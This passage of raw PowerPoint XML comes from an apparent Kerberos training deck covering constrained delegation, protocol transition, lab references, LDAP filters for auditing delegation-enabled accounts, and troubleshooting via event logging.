            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sname:	HTTP/www.contoso.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="テキスト ボックス 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051416" y="4364764"/>
            <a:ext cx="2693478" cy="908276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Client’s Service Ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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16" name="右矢印 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4404360" y="2342265"/>
            <a:ext cx="579120" cy="419828"/>
          </a:xfrm>
          <a:prstGeom prs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26" name="テキスト ボックス 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248771" y="3413411"/>
            <a:ext cx="3194925" cy="608693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cname:	sqluser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Realm:	CONTOSO.COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="0" indent="-173038" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst>
                <a:tab pos="808038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sname:	MSSQLSvc/mssql.contoso.com:1433</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="テキスト ボックス 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248771" y="3113828"/>
            <a:ext cx="3194925" cy="908276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" noProof="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Service Ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1"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18" name="角丸四角形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170550" y="5734162"/>
            <a:ext cx="6801664" cy="360000"/>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1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Front-end server could get a service ticket with Client’s name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113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Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Constrained Delegation (S4U2Proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="907941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Not registered SPN</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> TGS Exchange failed with KDC_ERR_BADOPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="690906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Lab 8.1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Constrained Delegation (S4U2Proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185074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de-DE" dirty="0"/>
              <a:t>Protocol Transition (S4U2Self)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4062651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos protocol transition allows a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> service” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to obtain a service ticket to itself on behalf of a Kerberos principal because no user credential is required for the transition to happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is basically the same process as constrained delegation but the server does not require an evidence ticket. And of course there is no forwarded TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without “Act as part of the Operating System”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation level of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecurityIdentification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for Authorization only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process cannot operate under users identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With “Act as part of the Operating System”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation level of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SecurityImpersonation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process can impersonate user and request further service tickets for access to resources</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390503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Lab 8.2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Protocol Transition (S4U2Self)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357992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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and Authorization (Kerberos Delegation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3585597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As Kerberos Delegation is a security sensitive setting, all the accounts should be documented and verified regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get all accounts that are enabled for Kerberos Delegation:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=*)(userAccountControl:1.2.840.113556.1.4.803:=524288))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get all accounts that are enabled for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>contrained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Kerberos Delegation:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>=*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>msDS-AllowedToDelegateTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>=*))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get all accounts that are enabled for protocol transition</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=*)(userAccountControl:1.2.840.113556.1.4.803:=16777216))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Get all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>acconts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> that are sensitive and cannot be delegated</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=*)(userAccountControl:1.2.840.113556.1.4.803:=1048576))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attached PowerShell “Get-ADKerberosEnabledPrincipals.ps1” script retrieves all users that belong to one of these four groups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176492139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3014663" y="5416550"/>
          <a:ext cx="2686050" cy="577850"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="2685960" imgH="577800" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Packager Shell Object" showAsIcon="1" r:id="rId3" imgW="2685960" imgH="577800" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="5" name="Object 4"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="3014663" y="5416550"/>
                        <a:ext cx="2686050" cy="577850"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416236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Tools</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="5386090"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knowhow – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>implicit troubleshooting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by understanding the concept and protocol flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>describe the setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– domain environment, used account identities and configured SPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event Logging: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Kerberos (Client): in System Event log, extendable via setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LogLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> per KB 262177 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>How to enable Kerberos event logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>” (may bring up “false-positives”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
